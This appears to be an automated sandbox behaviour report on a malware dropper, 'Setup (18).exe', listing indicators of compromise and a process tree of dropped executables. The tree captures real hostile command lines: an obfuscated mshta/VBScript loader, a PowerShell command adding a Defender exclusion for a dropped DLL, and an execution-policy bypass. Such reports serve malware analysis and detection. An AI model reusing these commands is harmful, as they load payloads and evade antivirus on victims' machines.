80387219e06244e9e66391b3bb226d6c06fddbdb0a03ac7ee686e2f70a4b62bb6c918915f8e195380d1ee4c3e09f4c688b9fd86ef35f93f9c2ee94b426a972089c08039023d1c9e306b3e5aade9cc226898d0d2acebe25bc2507a2508dae4fb82c9bb4e80b1b3a11a64651609ed092bb5c956a03939b46fa2fe86d86db3ed2c UpdateCore.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 10676 PING.EXE 9184 PING.EXE 9264 PING.EXE -
Script User-Agent 34 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 232 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 246 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 540 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 228 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 466 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 178 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 180 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 375 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 382 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 418 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 456 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 146 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 279 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 381 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 416 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 440 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 198 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 193 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 415 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 471 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 483 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 182 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 148 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 195 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 240 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 242 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 252 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 278 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 373 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 145 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 459 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 244 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 250 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 225 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 656 Setup (18).exe 656 Setup (18).exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4996 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4488 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3092 Process not Found -
Suspicious behavior: MapViewOfSection 56 IoCs
pid Process 1596 mMYCkNeRpztI34hbp8udunJt.exe 7400 RTa9h1GEw8MZAkMnDG_Wd_nd.exe 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 3092 Process not Found 9312 explorer.exe 9312 explorer.exe 10200 explorer.exe 10200 explorer.exe 4312 explorer.exe 4312 explorer.exe 4312 explorer.exe 4312 explorer.exe 9312 explorer.exe 9312 explorer.exe 10200 explorer.exe 10200 explorer.exe 9312 explorer.exe 9312 explorer.exe 10200 explorer.exe 10200 explorer.exe 4312 explorer.exe 4312 explorer.exe 10200 explorer.exe 10200 explorer.exe 4312 explorer.exe 4312 explorer.exe 9312 explorer.exe 9312 explorer.exe 9312 explorer.exe 9312 explorer.exe 10200 explorer.exe 10200 explorer.exe 4312 explorer.exe 4312 explorer.exe 4312 explorer.exe 4312 explorer.exe 9312 explorer.exe 9312 explorer.exe 10200 explorer.exe 10200 explorer.exe -
Suspicious behavior: SetClipboardViewer 3 IoCs
pid Process 6768 3855574.exe 7208 4349180.exe 5640 Clip_.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 940 mG4d8IwTgRrAL4FE5iY8YRB7.exe Token: SeDebugPrivilege 3832 _fo2akGzHM8e3HDnYwqptuNS.exe Token: SeDebugPrivilege 2808 _bBir4fW40ZAieqy4xVVVqdZ.exe Token: SeRestorePrivilege 4996 WerFault.exe Token: SeBackupPrivilege 4996 WerFault.exe Token: SeDebugPrivilege 4996 WerFault.exe Token: SeDebugPrivilege 412 CLgPUq5AVvZwY3l8lxZ97G9O.exe Token: SeDebugPrivilege 4712 7SrzRNSSzQZ1yRbsPelarolG.exe Token: SeDebugPrivilege 4488 WerFault.exe Token: SeDebugPrivilege 3420 sJmbQWB0NpkfM_pWcJqhL9vW.exe Token: SeDebugPrivilege 1328 Jio2aWKJp8cWMZdrGeQ8KEbN.exe Token: SeDebugPrivilege 3260 llVVu0HlsK1Kw5wuGRgoKpD7.exe Token: SeDebugPrivilege 4652 WerFault.exe Token: SeDebugPrivilege 908 EVawsdwdyWR8sahgToN8uJ5E.exe Token: SeDebugPrivilege 4704 ZilQa116kCxMyJ4DYppJKSNT.exe Token: SeDebugPrivilege 4876 WerFault.exe Token: SeDebugPrivilege 5040 WerFault.exe Token: SeDebugPrivilege 1852 WerFault.exe Token: SeDebugPrivilege 2844 9uYgZkgS3XwN7z_tehB60XIr.exe Token: SeDebugPrivilege 4788 1024372.exe Token: SeDebugPrivilege 5192 6774205.exe Token: SeDebugPrivilege 5556 MsiExec.exe Token: SeDebugPrivilege 1584 _fo2akGzHM8e3HDnYwqptuNS.exe Token: SeDebugPrivilege 4744 8195904.exe Token: SeDebugPrivilege 5736 WerFault.exe Token: SeDebugPrivilege 5892 WerFault.exe Token: SeDebugPrivilege 6036 WerFault.exe Token: SeDebugPrivilege 5580 WerFault.exe Token: SeDebugPrivilege 3732 gAScRkDwlUWDTNNmOfKcnrA7.exe Token: SeDebugPrivilege 5244 PBrowFile15.exe Token: SeDebugPrivilege 6028 WerFault.exe Token: SeDebugPrivilege 5400 WerFault.exe Token: SeDebugPrivilege 4208 WerFault.exe Token: SeDebugPrivilege 5592 Setup.exe Token: SeDebugPrivilege 5828 WerFault.exe Token: SeDebugPrivilege 5592 Setup.exe Token: SeDebugPrivilege 2656 svchost.exe Token: SeDebugPrivilege 5592 Setup.exe Token: SeDebugPrivilege 5592 Setup.exe Token: SeDebugPrivilege 5592 Setup.exe Token: SeDebugPrivilege 5592 Setup.exe Token: SeDebugPrivilege 5592 Setup.exe Token: SeDebugPrivilege 5592 Setup.exe Token: SeDebugPrivilege 5592 Setup.exe Token: SeDebugPrivilege 6476 WerFault.exe Token: SeDebugPrivilege 5592 Setup.exe Token: SeDebugPrivilege 5592 Setup.exe Token: SeDebugPrivilege 5592 Setup.exe Token: SeManageVolumePrivilege 4724 md8_8eus.exe Token: SeAssignPrimaryTokenPrivilege 2428 svchost.exe Token: SeIncreaseQuotaPrivilege 2428 svchost.exe Token: SeSecurityPrivilege 2428 svchost.exe Token: SeTakeOwnershipPrivilege 2428 svchost.exe Token: SeLoadDriverPrivilege 2428 svchost.exe Token: SeSystemtimePrivilege 2428 svchost.exe Token: SeBackupPrivilege 2428 svchost.exe Token: SeRestorePrivilege 2428 svchost.exe Token: SeShutdownPrivilege 2428 svchost.exe Token: SeSystemEnvironmentPrivilege 2428 svchost.exe Token: SeUndockPrivilege 2428 svchost.exe Token: SeManageVolumePrivilege 2428 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2428 svchost.exe Token: SeIncreaseQuotaPrivilege 2428 svchost.exe Token: SeSecurityPrivilege 2428 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4140 j6dICuruH5OX6Xd08n6Q5qCn.tmp 5152 Cleaner Installation.exe 3092 Process not Found 3092 Process not Found 5296 Inlog.tmp 5616 WEATHER Manager.tmp 5624 VPN.tmp 4536 Stats.tmp 4640 Setup.tmp 6744 Setup.exe 6348 Setup.tmp 572 Lx1ZUHXJ3OrL_roz81lD9EQ3.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 5536 ultramediaburner.tmp 8760 GameBoxWin64.exe 7144 rundll32.exe 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 3092 Process not Found 3092 Process not Found -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 6856 builder.exe 10000 cmd.exe 5640 Clip_.exe 9976 Red1_.exe 3092 Process not Found 9836 MicrosoftEdge.exe 4184 MicrosoftEdgeCP.exe 10956 MaskVPNUpdate.exe 4184 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 656 wrote to memory of 4048 656 Setup (18).exe 81 PID 656 wrote to memory of 4048 656 Setup (18).exe 81 PID 656 wrote to memory of 4048 656 Setup (18).exe 81 PID 656 wrote to memory of 412 656 Setup (18).exe 80 PID 656 wrote to memory of 412 656 Setup (18).exe 80 PID 656 wrote to memory of 412 656 Setup (18).exe 80 PID 656 wrote to memory of 3648 656 Setup (18).exe 79 PID 656 wrote to memory of 3648 656 Setup (18).exe 79 PID 656 wrote to memory of 3648 656 Setup (18).exe 79 PID 656 wrote to memory of 4080 656 Setup (18).exe 78 PID 656 wrote to memory of 4080 656 Setup (18).exe 78 PID 656 wrote to memory of 4080 656 Setup (18).exe 78 PID 656 wrote to memory of 3668 656 Setup (18).exe 77 PID 656 wrote to memory of 3668 656 Setup (18).exe 77 PID 656 wrote to memory of 3668 656 Setup (18).exe 77 PID 656 wrote to memory of 1596 656 Setup (18).exe 82 PID 656 wrote to memory of 1596 656 Setup (18).exe 82 PID 656 wrote to memory of 1596 656 Setup (18).exe 82 PID 656 wrote to memory of 416 656 Setup (18).exe 84 PID 656 wrote to memory of 416 656 Setup (18).exe 84 PID 656 wrote to memory of 416 656 Setup (18).exe 84 PID 656 wrote to memory of 2724 656 Setup (18).exe 85 PID 656 wrote to memory of 2724 656 Setup (18).exe 85 PID 656 wrote to memory of 2724 656 Setup (18).exe 85 PID 656 wrote to memory of 2832 656 Setup (18).exe 83 PID 656 wrote to memory of 2832 656 Setup (18).exe 83 PID 656 wrote to memory of 2832 656 Setup (18).exe 83 PID 656 wrote to memory of 940 656 Setup (18).exe 90 PID 656 wrote to memory of 940 656 Setup (18).exe 90 PID 656 wrote to memory of 3420 656 Setup (18).exe 89 PID 656 wrote to memory of 3420 656 Setup (18).exe 89 PID 656 wrote to memory of 3420 656 Setup (18).exe 89 PID 656 wrote to memory of 1328 656 Setup (18).exe 88 PID 656 wrote to memory of 1328 656 Setup (18).exe 88 PID 656 wrote to memory of 1328 656 Setup (18).exe 88 PID 656 wrote to memory of 1156 656 Setup (18).exe 87 PID 656 wrote to memory of 1156 656 Setup (18).exe 87 PID 656 wrote to memory of 1156 656 Setup (18).exe 87 PID 656 wrote to memory of 688 656 Setup (18).exe 93 PID 656 wrote to memory of 688 656 Setup (18).exe 93 PID 656 wrote to memory of 688 656 Setup (18).exe 93 PID 656 wrote to memory of 3712 656 Setup (18).exe 92 PID 656 wrote to memory of 3712 656 Setup (18).exe 92 PID 656 wrote to memory of 3712 656 Setup (18).exe 92 PID 656 wrote to memory of 3732 656 Setup (18).exe 91 PID 656 wrote to memory of 3732 656 Setup (18).exe 91 PID 656 wrote to memory of 3732 656 Setup (18).exe 91 PID 656 wrote to memory of 2808 656 Setup (18).exe 98 PID 656 wrote to memory of 2808 656 Setup (18).exe 98 PID 656 wrote to memory of 3832 656 Setup (18).exe 99 PID 656 wrote to memory of 3832 656 Setup (18).exe 99 PID 656 wrote to memory of 3832 656 Setup (18).exe 99 PID 656 wrote to memory of 4056 656 Setup (18).exe 103 PID 656 wrote to memory of 4056 656 Setup (18).exe 103 PID 656 wrote to memory of 4056 656 Setup (18).exe 103 PID 656 wrote to memory of 1360 656 Setup (18).exe 101 PID 656 wrote to memory of 1360 656 Setup (18).exe 101 PID 656 wrote to memory of 908 656 Setup (18).exe 102 PID 656 wrote to memory of 908 656 Setup (18).exe 102 PID 656 wrote to memory of 908 656 Setup (18).exe 102 PID 656 wrote to memory of 2460 656 Setup (18).exe 106 PID 656 wrote to memory of 2460 656 Setup (18).exe 106 PID 656 wrote to memory of 2460 656 Setup (18).exe 106 PID 656 wrote to memory of 2844 656 Setup (18).exe 105
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2656 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4532
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2436
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2320
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2272
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1864
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1456
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1396
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1288
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1148
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1064 -
C:\ProgramData\qifjdtl\ogbsoj.exeC:\ProgramData\qifjdtl\ogbsoj.exe start2⤵PID:6384
-
-
C:\Users\Admin\AppData\Roaming\bufagheC:\Users\Admin\AppData\Roaming\bufaghe2⤵PID:8260
-
-
C:\Users\Admin\AppData\Roaming\edfagheC:\Users\Admin\AppData\Roaming\edfaghe2⤵PID:9052
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:352
-
C:\Users\Admin\AppData\Local\Temp\Setup (18).exe"C:\Users\Admin\AppData\Local\Temp\Setup (18).exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Users\Admin\Documents\Hooe672OqdQEz4Znx7iSvZOE.exe"C:\Users\Admin\Documents\Hooe672OqdQEz4Znx7iSvZOE.exe"2⤵
- Executes dropped EXE
PID:3668 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\HOOE67~1.DLL,s C:\Users\Admin\DOCUME~1\HOOE67~1.EXE3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:7276 -
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\HOOE67~1.DLL,YFkHSA==4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
PID:7772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\HOOE67~1.DLL5⤵PID:8512
-
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\HOOE67~1.DLL,YBRL5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
PID:5952 -
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 178976⤵
- Suspicious use of FindShellTrayWindow
PID:7144 -
C:\Windows\system32\ctfmon.exectfmon.exe7⤵PID:8444
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp1E98.tmp.ps1"5⤵PID:3160
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1036
-
-
-
-
-
-
C:\Users\Admin\Documents\1a1m9aAFlQn4YP10h3KeKWnZ.exe"C:\Users\Admin\Documents\1a1m9aAFlQn4YP10h3KeKWnZ.exe"2⤵
- Executes dropped EXE
PID:4080 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 6643⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 6723⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 6763⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 6843⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 8843⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 10683⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
-
C:\Users\Admin\Documents\7GDU9OSLAivD45PaJ_Np6yTw.exe"C:\Users\Admin\Documents\7GDU9OSLAivD45PaJ_Np6yTw.exe"2⤵
- Executes dropped EXE
PID:3648 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\7GDU9OSLAivD45PaJ_Np6yTw.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\7GDU9OSLAivD45PaJ_Np6yTw.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )3⤵PID:4676
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\7GDU9OSLAivD45PaJ_Np6yTw.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\7GDU9OSLAivD45PaJ_Np6yTw.exe" ) do taskkill -IM "%~nXW" -f4⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu95⤵
- Executes dropped EXE
PID:5760 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )6⤵PID:6996
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f7⤵PID:1160
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE6⤵
- Loads dropped DLL
PID:7944
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "7GDU9OSLAivD45PaJ_Np6yTw.exe" -f5⤵
- Kills process with taskkill
PID:5828
-
-
-
-
-
C:\Users\Admin\Documents\CLgPUq5AVvZwY3l8lxZ97G9O.exe"C:\Users\Admin\Documents\CLgPUq5AVvZwY3l8lxZ97G9O.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:412
-
-
C:\Users\Admin\Documents\J6iNDogrvenIPg_ZJWx6UAoJ.exe"C:\Users\Admin\Documents\J6iNDogrvenIPg_ZJWx6UAoJ.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4048 -
C:\Users\Admin\Documents\J6iNDogrvenIPg_ZJWx6UAoJ.exe"C:\Users\Admin\Documents\J6iNDogrvenIPg_ZJWx6UAoJ.exe"3⤵
- Executes dropped EXE
PID:4720
-
-
-
C:\Users\Admin\Documents\mMYCkNeRpztI34hbp8udunJt.exe"C:\Users\Admin\Documents\mMYCkNeRpztI34hbp8udunJt.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
PID:1596
-
-
C:\Users\Admin\Documents\w5imdGd9mfkpFoQNpJG6TmYK.exe"C:\Users\Admin\Documents\w5imdGd9mfkpFoQNpJG6TmYK.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 7603⤵
- Program crash
PID:5556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 7843⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 8123⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5892
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 8243⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:6036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 9563⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 9843⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:6028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 10043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 10843⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 14363⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:6476
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 14723⤵
- Program crash
PID:6752
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 14803⤵
- Program crash
PID:6932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 16763⤵
- Program crash
PID:6448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 16363⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6928
-
-
-
C:\Users\Admin\Documents\po04WAP4mZxGKoA0vPcy97Tk.exe"C:\Users\Admin\Documents\po04WAP4mZxGKoA0vPcy97Tk.exe"2⤵
- Executes dropped EXE
PID:416 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0670795689.exe"3⤵PID:4932
-
C:\Users\Admin\AppData\Local\Temp\0670795689.exe"C:\Users\Admin\AppData\Local\Temp\0670795689.exe"4⤵PID:2204
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0008172018.exe"3⤵PID:6256
-
C:\Users\Admin\AppData\Local\Temp\0008172018.exe"C:\Users\Admin\AppData\Local\Temp\0008172018.exe"4⤵PID:6568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 7445⤵
- Program crash
PID:1776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 7325⤵
- Program crash
PID:8120
-
-
